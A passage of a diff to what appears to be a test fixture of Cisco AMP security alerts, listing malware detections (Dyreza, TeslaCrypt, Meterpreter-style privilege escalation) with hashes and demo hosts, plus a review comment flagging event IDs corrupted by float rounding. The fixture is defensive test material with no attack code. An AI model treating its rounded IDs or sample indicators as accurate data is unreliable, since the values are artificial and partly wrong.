"ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 245952, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667841684537367", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 532000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667841684537000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": 
"Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 247271, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258118058508361", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 636000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258118058508000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 
251240, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667837389570068", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 689000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667837389570000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 252559, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - 
"related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258066518900808", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 608000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258066518901000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 253878, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:29.000Z", - "cisco.amp.computer.active": true, - 
"cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258014979293255", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 581000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258014979293000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 255197, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - 
"cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257963439685702", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 569000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176257963439686000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 256516, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:12:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667579691532307", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - 
"63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 778000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 900000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667579691532000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 257835, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 22893, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + 
"process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -4353,64 +700,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55807, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:52.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667575396565008", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006658", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 971000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 869000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667575396565000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 261804, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 24346, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
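Review bot: The added `"event.id": 6180341055704007000` in this record no longer agrees with the string `"cisco.amp.detection_id": "6180341055704006658"` next to it, which suggests the 64-bit id is being emitted as a JSON number and rounded as a float64 before the expected output is written. The record that closes in the preceding hunk (`log.offset` 22893, a different `cisco.amp.timestamp_nanoseconds`) carries the same `event.id`, so two distinct alerts share one id in this fixture; the later hunk shows the same rounding (`6533671385032557000` beside detection_id `"6533671385032556606"`). Anything that deduplicates, correlates or pivots on `event.id` could merge or miss these alerts. I would have the pipeline keep the id as a string, so this line reads `"event.id": "6180341055704006658"`. Where the conversion happens is outside this hunk and needs confirming against the ingest pipeline.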
@@ -4418,61 +772,61 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55806, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:49.000Z", + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "27:85:29:21:67:49" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257843180601413", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "27:85:29:21:67:49" ], - "cisco.amp.timestamp_nanoseconds": 536000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", "event.category": [ - "file", - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 6176257843180601000, + "event.id": 1476910664322001000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 
"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 263122, + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Command_Line_Arguments_Meterpreter" ], "related.ip": [ "8.8.8.8", 
@@ -4485,43 +839,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:48.000Z", + "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648166, + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 82375000, - "event.action": "Uninstall", "event.dataset": "cisco.amp", - "event.id": 834324, + "event.id": 6533671385032557000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 264441, + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], "related.hosts": [ - "Demo_AMP_Exploit_Prevention" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4529,55 +906,50 @@ ] }, { - "@timestamp": "2021-01-15T10:12:37.000Z", + "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257791640993860", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 898000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257791640994000, + "event.id": 1489955900329000200, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 265349, + "log.offset": 28756, + 
"process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_Dyre" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", 
@@ -4590,60 +962,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:25.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 901000000, + "cisco.amp.timestamp_nanoseconds": 947000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257740101386000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
